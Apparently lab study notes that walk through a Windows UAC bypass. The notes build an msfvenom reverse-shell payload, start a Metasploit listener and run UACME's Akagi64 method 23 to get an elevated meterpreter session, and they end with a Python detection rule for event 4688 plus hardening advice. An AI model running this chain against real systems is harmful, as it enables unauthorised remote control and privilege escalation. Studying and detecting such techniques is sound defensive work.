UAC Bypass Akagi64.exe

Get a meterpreter session on the target and follow the technique below:

getprivs
    Enabled Process Privileges
    ==========================
    Name
    ----
    SeChangeNotifyPrivilege
    SeIncreaseWorkingSetPrivilege
    SeShutdownPrivilege
    SeTimeZonePrivilege
    SeUndockPrivilege
  • Verify if the admin user is part of the local administrators group

shell
net user
net localgroup administrators

    Alias name   administrators
    Comment   Administrators have complete and unrestricted access to the computer/domain
    Members
    -------------------------------------------------------------------------------
    admin
    Administrator
# "admin" user is a local administrator
  • In order to run programs or tasks with elevated privileges, a UAC bypass is necessary: although admin is a local administrator, the session holds the filtered (medium-integrity) token, which is why getprivs shows only the standard-user privileges

# UAC Bypass & Privesc

ls /root/Desktop/tools/UACME/
    Akagi64.exe
  • Generate a meterpreter payload with msfvenom

ip -br -c a
    eth1@if162568  UP  10.10.4.2/24
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.4.2 LPORT=1234 -f exe > backdoor.exe
  • Set up a new msfconsole session and a multi/handler listener to receive the connection once the payload is executed on the target

    • set the payload to the one used with msfvenom (windows/meterpreter/reverse_tcp)

    • set LHOST and LPORT to the attack machine's IP and the port used in the msfvenom payload

msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.4.2
set LPORT 1234
run
  • The reverse_tcp handler is listening and ready to receive the connection from the malicious payload

  • Head back into the meterpreter session already opened

cd C:\\
mkdir Temp
cd Temp
# or use
# cd C:\\Users\\admin\\AppData\\Local\\Temp

upload /root/backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe
  • UAC would prevent backdoor.exe from running with elevated privileges

  • Run the Akagi64.exe executable with UACMe method 23

# run from the target's command shell (meterpreter: shell)
Akagi64.exe 23 C:\Temp\backdoor.exe
  • An elevated meterpreter session should be received on the listener
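From the defender's side, the chain above leaves a recognisable trace: an image staged in a user-writable temp directory (C:\Temp or %LOCALAPPDATA%\Temp) ends up running with a full (elevated) token for an interactive user account, without the user ever passing a consent prompt. The following is an added detection example, not part of the original notes or of UACMe: it parses constructed log lines loosely modelled on the fields of Windows Security event 4688 (New Process Created) and flags exactly that combination. The key=value line format, the sample records and the WRITABLE_DIRS list are assumptions; the token elevation type codes (%%1936 default, %%1937 full, %%1938 limited) are the values Windows logs in that event.

```python
import re

# Constructed record format, loosely modelled on Windows Security event 4688.
# Real 4688 events are XML/EVTX; the key=value lines here are an assumption
# so the example runs offline.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

# TokenElevationType values as logged by event 4688:
# %%1936 = default (no UAC split token), %%1937 = full/elevated, %%1938 = limited.
FULL_TOKEN = "%%1937"

# Staging directories any local user can write to (assumption: extend for your estate).
WRITABLE_DIRS = (
    "c:\\temp\\",
    "\\appdata\\local\\temp\\",
    "c:\\users\\public\\",
)

# Constructed sample records mirroring the scenario in the notes:
# Akagi64.exe starts with the user's limited token, and backdoor.exe then
# appears with a full token even though it lives in C:\Temp.
SAMPLE_4688 = [
    "EventID=4688 SubjectUserName=admin NewProcessName=C:\\Temp\\Akagi64.exe "
    "TokenElevationType=%%1938 ParentProcessName=C:\\Windows\\System32\\cmd.exe",
    "EventID=4688 SubjectUserName=admin NewProcessName=C:\\Temp\\backdoor.exe "
    "TokenElevationType=%%1937 ParentProcessName=C:\\Windows\\System32\\svchost.exe",
    "EventID=4688 SubjectUserName=admin NewProcessName=C:\\Windows\\System32\\notepad.exe "
    "TokenElevationType=%%1938 ParentProcessName=C:\\Windows\\explorer.exe",
    "EventID=4688 SubjectUserName=admin NewProcessName=C:\\Program Files\\Tool\\tool.exe "
    "TokenElevationType=%%1937 ParentProcessName=C:\\Windows\\explorer.exe",
    "EventID=4688 SubjectUserName=SYSTEM NewProcessName=C:\\Windows\\Temp\\installer.exe "
    "TokenElevationType=%%1936 ParentProcessName=C:\\Windows\\System32\\services.exe",
]


def parse_record(line):
    """Split one key=value record into a dict (values may contain spaces)."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def is_suspicious(rec):
    """True when a non-SYSTEM account obtained a full (elevated) token for an
    image that lives in a user-writable staging directory."""
    if rec.get("EventID") != "4688":
        return False
    if rec.get("TokenElevationType") != FULL_TOKEN:
        return False
    if rec.get("SubjectUserName", "").upper() == "SYSTEM":
        return False
    image = rec.get("NewProcessName", "").lower()
    return any(directory in image for directory in WRITABLE_DIRS)


def find_suspicious(lines):
    """Return the image paths of all records that match the rule."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if is_suspicious(rec):
            hits.append(rec["NewProcessName"])
    return hits


if __name__ == "__main__":
    for path in find_suspicious(SAMPLE_4688):
        print("elevated process from writable staging dir:", path)
```

Only backdoor.exe is reported: Akagi64.exe itself runs with the limited token, notepad.exe is not elevated, tool.exe is elevated but lives under Program Files (a normal consented elevation), and the SYSTEM installer has no split token at all. Event 4688 is only produced when "Audit Process Creation" is enabled, so that policy is a prerequisite for this rule. On the prevention side, setting UAC to "Always notify" (ConsentPromptBehaviorAdmin = 2 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System) removes the silent auto-elevation that the UACMe methods rely on, and the rule above will then only fire for elevations that a user explicitly approved from an unusual location.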
